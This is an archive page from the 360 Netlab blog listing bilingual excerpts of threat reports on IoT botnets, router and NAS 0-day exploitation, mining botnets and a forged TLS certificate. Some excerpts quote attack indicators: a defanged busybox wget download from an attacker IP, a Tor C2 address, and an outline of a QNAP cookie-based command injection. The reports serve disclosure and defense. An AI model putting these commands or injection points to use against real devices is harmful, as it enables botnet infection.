Import 2022-11-30 11:16 - 360 Netlab Blog - Network Security Research Lab at 360 (Page 5)

Import 2022-11-30 11:16

A collection of 250 posts

Ttint: An IoT Remote Access Trojan spread through 2 0-day vulnerabilities

Author: Lingming Tu, Yanlong Ma, Genshen Ye Background introduction Starting from November 2019, 360Netlab Anglerfish system have successively monitored attacker using two Tenda router 0-day vulnerabilities to spread a Remote Access Trojan (RAT) based on Mirai code. The conventional Mirai variants normally focus on DDoS, but this variant is different.

Ttint: 一款通过2个0-day漏洞传播的IoT远控木马

本文作者：涂凌鸣，马延龙，叶根深背景介绍从2019年11月开始，360Netlab未知威胁检测系统Anglerfish蜜罐节点相继监测到某个攻击者使用2个腾达路由器0-day漏洞传播一个基于Mirai代码开发的远程控制木马（RAT）。常规的Mirai变种基本都是围绕DDoS做文章，而这个变种不同，在DDoS攻击之外，它针对路由器设备实现了Socket5代理，篡改路由器DNS，设置iptables，执行自定义系统命令等多达12个远程控制功能。此外，在C2通信层面，它使用WSS (WebSocket over TLS) 协议，一方面这样在流量层面可以规避非常成熟的Mirai流量检测，另一方面可以为C2提供安全加密通信。在C2本身，攻击者最开始使用了一个Google的云服务IP，其后切换到位于香港的一台托管主机，但是当我们使用网站证书，样本，域名及IP在我们的DNSmon系统里深入扩展关联后，我们看到更多的基础设施IP，更多的样本，和更多的C2域名。两个0 day，网关设备的12种远控功能，加密流量协议，多次更换的基础设施IP，我们怀疑这个也许不是普通玩

Ghost in action: the Specter botnet

Background On August 20, 2020, 360Netlab Threat Detect System captured a suspicious ELF file (22523419f0404d628d02876e69458fbe.css)with 0 VT detection. When we took a close look, we see a new botnet that targets AVTECH IP Camera / NVR / DVR devices, and it has flexible configuration, highly modular / plugin, and uses TLS,

幽灵在行动：Specter分析报告

背景 2020年8月20日，360Netlab未知威胁检测系统捕获了一个通过漏洞传播可疑ELF文件(22523419f0404d628d02876e69458fbe.css)，其独特的文件名，TLS网络流量以及VT杀软0检出的情况，引起了我们的兴趣。经过分析，我们确定它是一个配置灵活，高度模块化/插件化，使用TLS，ChaCha20，Lz4加密压缩网络通信，针对AVTECH IP Camera / NVR / DVR 设备的恶意家族，我们捕获的ELF是Dropper，会释放出一个Loader,而Loader则会通过加密流量向C2请求各种Plugin以实现不同的功能。样本build路径为/build/arm-specter-linux-uclibcgnueabi，所以我们命名为Specter。目前来看，Specter有很多不专业的地方，比如，它在释放Loader的同时也释放2个运行时所需要的库，但它们都是dynamically linked。又如下载的Plugin落在文件上再加载而不是在内存中直接展开加载。而且Dropper的传播是利用5年旧的老漏洞；但是在另外一方面，它

360网络安全研究院杭州开点招聘

团队简介 360网络安全研究院（360Netlab）于2014年成立。不同于传统网络安全主要基于规则，数据分析是团队的主要方向。团队持续专注于DNS和僵尸网络领域，并在领域内保持领先地位。从2014年开始，团队在DNS方向上建设了国内历史最久、覆盖范围最广的PassiveDNS基础数据库，及其附属其它基础数据库，持续分析产出威胁情报并应用于360网络安全大脑，并在多个DNS领域内的技术会议上做公开报告。在僵尸网络领域内，团队多年来持续致力于发现跟踪僵尸网络活动，披露了包括Mirai、Satori在内的若干重大安全威胁，并因为其中针对Mirai僵尸网络的持续分析工作得到美国FBI、美国司法部的致谢。 360网络安全研究院计划在杭州新成立一个产品团队，把我们的安全数据和技术产品化，探索网络安全行业未知威胁检测难题，为360安全大脑添砖加瓦。从一次平凡的网络扫描，到漏洞、样本、安全事件分析，再到0-day漏洞检测、未知恶意软件检测、高级威胁追踪，我们致力于通过数据驱动安全，构建网络安全看得见的能力。更多信息：https://netlab.360.com 简历投

QNAP NAS在野漏洞攻击事件

本文作者：马延龙，叶根深，金晔背景介绍 2020年4月21号开始，360Netlab未知威胁检测系统监测到有攻击者使用QNAP NAS设备漏洞，攻击我们的Anglerfish蜜罐节点。我们看到这个漏洞PoC并没有在互联网上公布，攻击者在漏洞利用过程中相对谨慎，互联网上也仍有一些未修复漏洞的QNAP NAS设备。因此，我们需要披露这个漏洞攻击事件，并提醒安全社区和QNAP NAS用户，避免受到此类漏洞攻击。漏洞分析漏洞类型: 未授权远程命令执行漏洞漏洞原因: 通过360 FirmwareTotal系统分析，我们发现这个漏洞出现CGI程序/httpd/cgi-bin/authLogout.cgi中。它在处理用户注销登录时，会根据Cookie中字段名称选择相应的注销登录函数。其中QPS_SID，QMS_SID和QMMS_SID注销登录函数未过滤特殊字符即使用snprintf函数拼接curl命令字符串并使用system函数直接执行，所以造成命令注入。漏洞修复：在2017年7月21号，我们发现QNAP发布固件版本4.3.3修复了这个漏洞。修复后的固件中使用qn

In the wild QNAP NAS attacks

Author:Yanlong Ma, Genshen Ye, Ye Jin From April 21, 2020, 360Netlab Anglerfish honeypot started to see a new QNAP NAS vulnerability being used to launch attack against QNAP NAS equipment. We noticed that this vulnerability has not been announced on the Internet, and the attacker is cautious in the

The new Bigviktor Botnet is Targeting DrayTek Vigor Router

Overview On June 17, 2020, 360Netlab Threat Detecting System flagged an interesting ELF sample (dd7c9d99d8f7b9975c29c803abdf1c33), further analysis shows that this is a DDos Bot program that propagates through the CVE-2020-8515 vulnerability which targets the DrayTek Vigor router device, and it uses DGA (Domain generation algorithm) to generate C2 domain names.

千面人:Bigviktor 分析报告

千面人:Bigviktor 分析报告

概览 2020年6月17日，360Netlab未知威胁检测系统发现一个低检测率的可疑ELF文件(dd7c9d99d8f7b9975c29c803abdf1c33)，目前仅有一款杀毒引擎检测识别;同时流量检测系统将其产生的部分流量标注了疑似DGA，这引起了我们的注意。经过详细分析，我们确定这是一个通过CVE-2020-8515漏洞传播，针对DrayTek Vigor路由器设备，拥有DGA特性，主要功能为DDos攻击的新僵尸网络的Bot程序。因为传播过程中使用的"viktor"文件名(/tmp/viktor)以及样本中的0xB16B00B5(big boobs)字串，我们将其命名为Bigviktor。从网络层面来看，Bigviktor遍历DGA每月产生的1000个随机域名，通过请求RC4加密&ECSDA256签名的s.jpeg来确认当前存活的有效C2，然后向C2请求image.jpeg,执行具体的任务；从功能层面来看，Bigviktor支持8种指令，可以分成2大功能 * DDoS攻击 * 自更新其整体网络结构如图所示， Botnet规模日活Bot

An Update for a Very Active DDos Botnet: Moobot

Moobot is a mirai based botnet. Spread through weak telnet passwords and some nday and 0day vulnerabilities.

那些年我们一起追过的僵尸网络之Moobot

Moobot是一个基于mirai开发的僵尸网络,样本通过Telnet弱口令和利用nday,0day漏洞传播

Import 2022-11-30 11:16

The Gafgyt variant vbot seen in its 31 campaigns

Overview Gafgyt botnets have a long history of infecting Linux devices to launch DDoS attacks. While dozens of variants have been detected, new variants are constantly emerging with changes in terms of register message, exploits, and attacking methods. On the other hand, their new botnets are usually short lived, with

Look at NTP pool using DNS data

With the rapid development of the Internet, more and more people have realized the importance of network infrastructure. We don’t hear people talk about NTP ( Network Time Protocol) much though. Whether NTP can work well will affect the operation of most time-based computer system. For example, IPSEC tunnel establishment,

从DNS角度看NTP pool服务器的使用

随着互联网的快速发展，其已经深入到日常生活中的方方面面，越来越多的业内人员对于网络基础设施的重要性有了非常深入的认识。不过谈到基础设施，通常都会谈及DNS协议，但是还有一个关键的协议NTP（Network Time Protocol）却没有得到应有的重视。 NTP是否能够良好的工作会影响到计算机系统的大部分基于时间判定的逻辑的正确运行。比如DNSSEC是否过期，IPSEC的隧道建立，TLS证书的有效性校验，个人密码的过期，crontab任务的执行等等[1]。 NTP协议同DNS类似，是互联网最古老的协议之一，主要作用如其名字所说，用来保持设备时间的同步。在我们使用的操作系统比如windows，Android或者Macos都配置有自己的NTP时间服务器来定期同步设备上的时间。 NTP pool 是什么？由于互联网的发展以及NTP业务的特殊性（时间需要定期同步），少量的NTP服务器的负载越来越大，并且公共一级NTP授时服务器存在被滥用的问题，2003年1月NTP pool项目正式设立。其基本原理通过域名“pool.ntp.org”基于特定规则划分为多个子域名并在这些子域名上

Import 2022-11-30 11:16

New activity of DoubleGuns Group, control hundreds of thousands of bots via public cloud service

Overview Recently, our DNS data based threat monitoning system DNSmon flagged a suspicious domain pro.csocools.com. The system estimates the scale of infection may well above hundreds of thousands of users. By analyzing the related samples and C2s, We traced its family back to the ShuangQiang(double gun) campaign,

Import 2022-11-30 11:16

双枪团伙新动向，借云服务管理数十万僵尸网络

本文作者：jinye，JiaYu，suqitian，核心安全部研究员THL 概述近日，我们的域名异常监测系统 DNSMon 捕捉到域名 pro.csocools.com 的异常活动。根据数据覆盖度估算，感染规模超过100k。我们通过告警域名关联到一批样本和 C2，分析样本后发现是与双枪恶意程序相关的团伙开始新的大规模活动。近年来双枪团伙屡次被安全厂商曝光和打击，但每次都能死灰复燃高调复出，可见其下发渠道非常庞大。本次依然是因为受感染主机数量巨大，导致互联网监测数据异常，触发了netlab的预警系统。本报告中我们通过梳理和这些URL相关的C2发现了一些模式，做了一些推测。我们观察到恶意软件除了使用百度贴吧图片来分发配置文件和恶意软件，还使用了阿里云存储来托管配置文件。为了提高灵活性和稳定性，加大阻拦难度，开发者还利用百度统计这种常见的网络服务来管理感染主机的活跃情况。同时我们在样本中多次发现了腾讯微云的URL地址，有意思的是我们在代码中并没有找到引用这些地址的代码。至此，双枪团伙第一次将BAT三大厂商的服务集成到了自己的程序中，可以预见使用开放服务来管理僵尸网络或将成为

DDG的新征程——自研P2P协议构建混合P2P网络

1. 概述 DDG Mining Botnet 是一个活跃已久的挖矿僵尸网络，其主要的盈利方式是挖 XMR。从 2019.11 月份至今，我们的 Botnet 跟踪系统监控到 DDG Mining Botnet 一直在频繁跟新，其版本号和对应的更新时间如下图所示：其中，v4005~v4011 版本最主要的更新是把以前以 Hex 形式硬编码进样本的 HubList 数据，改成了 Gob 序列化的方式；v5009 及以后的版本，则摒弃了以前基于 Memberlist 来构建 P2P 网络的方式，改用自研的 P2P 协议来构建混合模式 P2P 网络。简化的网络结构如下：右边服务器是 C&C Server，DDG

The LeetHozer botnet

Background On March 26, 2020, we captured a suspicious sample11c1be44041a8e8ba05be9df336f9231. Although the samples have the word mirai in their names and most antivirus engines identified it as Mirai, its network traffic is totally new,which had got our attention. The sample borrowed some of Mirai’s Reporter and Loader mechanism,

LeetHozer Botnet分析报告

背景 2020年3月26日我们捕获了一个可疑的样本 11c1be44041a8e8ba05be9df336f9231，大部分杀毒引擎将其识别为Mirai，但是其网络流量却不符合Mirai的特征，这引起了注意，经分析，这是一个复用了Mirai的Reporter，Loader机制，重新设计了加密方法以及C2通信协议的Bot程序。 Mirai已经是安全社区非常熟悉的老朋友，蜜罐系统每天都能捕获大量的Mirai变种，这些变种都非常简单:要么是换一换C2;要么改一改加密的Key;要么集成些新的漏洞扫描……这些入门级的DDoser已经不能引起我们的任何兴趣了。这个Bot程序之所以能在众多变种脱颖而出，一是因为它独特的的加密方法，严谨的通信协议；二是因为在溯源过程中，我们发现它很有可能隶属于Moobot团伙而且正在迭代开发中（就在我们编写本文的同时作者更新了第三个版本，增加了一些新功能，更换了新的Tor CC vbrxmrhrjnnouvjf.onion:31337）。基于这些原因，我们决定将它曝光。因为传播过程中使用H0z3r字串(/bin/busybox wget http://37[.4

Multiple fiber routers are being compromised by botnets using 0-day

Author: Yanlong Ma, Genshen Ye, Lingming Tu, Ye Jin This is our 3rd IoT 0-day series article, in the past 30 days, we have already blogged about 2 groups targeting DrayTek CPE 0-day here [1], and Fbot botnet targeting Lilin DVR 0-day here [2]. Apparently while most botnets play catchup

多款光纤路由器设备在野0-day漏洞简报

本文作者：马延龙，叶根深，涂凌鸣，金晔大致情况这是我们过去30天内的第3篇IoT 0-day漏洞文章，之前我们还披露了DrayTek Router在野0-day漏洞分析报告[1]，LILIN DVR在野0-day漏洞分析报告[2]。我们观察到僵尸网络存在相互竞争获取更多的Bot规模的情况，其中有些僵尸网络拥有一些0-day漏洞资源，这使它们看起来与众不同。我们正在研究并观察IoT Botnet使用0-day漏洞传播是否是一个新趋势。 2020年2月28日，360Netlab未知威胁检测系统注意到Moobot僵尸网络[3]开始使用一种我们从未见过的新漏洞(多个步骤)，并且可以成功攻击受影响的设备。 2020年3月17日，我们确认此漏洞为0-day漏洞，并将结果报告给CNCERT。 2020年3月18日，Exploit Database[4]网站发布了Netlink GPON路由器远程命令执行漏洞PoC，这与我们发现的在野0-day漏洞特征一致。但是，该PoC遗漏了关键的一个步骤，因此实际被注入的命令并不能成功执行。 2020年3月19日，我们与相关厂商联系，

DDG botnet, round X, is there an ending?

DDG is a mining botnet that we first blogged about in Jan 2018, we reported back then that it had made a profit somewhere between 5.8million and 9.8million RMB(about 820,000 to 1.4Million US dollar ), we have many follow up blogs about this botnet after that,

Two zero days are Targeting DrayTek Broadband CPE Devices

Author: Yanlong Ma, Genshen Ye, Hongda Liu Background From December 4, 2019, 360Netlab Threat Detection System has observed two different attack groups using two 0-day vulnerabilities of DrayTek[1] Vigor enterprise routers and switch devices to conduct a series of attacks, including eavesdropping on device’s network traffic, running SSH

DrayTek Vigor企业级路由器和交换机设备在野0-day 漏洞分析报告

本文作者：马延龙，叶根深，刘宏达背景介绍从2019年12月4开始，360Netlab未知威胁检测系统持续监测到两个攻击团伙使用DrayTek Vigor企业级路由器和交换机设备0-day漏洞，窃听设备网络流量，开启SSH服务并创建系统后门账号，创建Web Session后门等恶意行为。 2019年12月25号，我们在Twitter[1][2]上披露了DrayTek Vigor在野0-day漏洞攻击IoC特征，并给相关国家CERT提供技术支持。 2020年2月10号，厂商DrayTek发布安全公告[3]，修复了该漏洞并发布了最新的固件程序1.5.1。漏洞分析我们根据Firmware Total系统[4] 进行DrayTek Vigor在野0-day漏洞定位和模拟漏洞验证。其中2个0-day漏洞命令注入点keyPath，rtick已经被厂商修复，它们均位于/www/cgi-bin/mainfunction.cgi程序中，对应的Web Server程序为/usr/sbin/lighttpd。 keyPath 命令注入漏洞分析漏洞类型：未授权远程命

一些网站https证书出现问题的情况分析

[20200328 17:00 更新] 更新数据到20200328 16:00. 20200326下午，有消息说[1]github的TLS证书出现了错误告警。证书的结构很奇怪，在其签发者信息中有一个奇怪的email地址：346608453@qq.com。明显是一个伪造的证书。为了弄清楚其中的情况，我们对这一事件进行了分析。 DNS劫持？出现证书和域名不匹配的最常见的一种情况是DNS劫持，即所访问域名的IP地址和真实建立连接的IP并不相同。以被劫持的域名go-acme.github.io为例，我们的passiveDNS库中该域名的IP地址主要使用如下四个托管在fastly上的IP地址，可以看到其数据非常干净。对该域名直接进行连接测试，可以看到，TCP连接的目的地址正是185.199.111.153，但其返回的证书却是错误的证书。因此github证书错误的问题并不是在DNS层面出现问题。劫持如何发生的？为了搞清楚这个问题，可以通过抓取链路上的数据包来进行分析。为了有较好的对比性，我们先后抓取了443端口和80端口的数据。如下图左边的数据包为https连接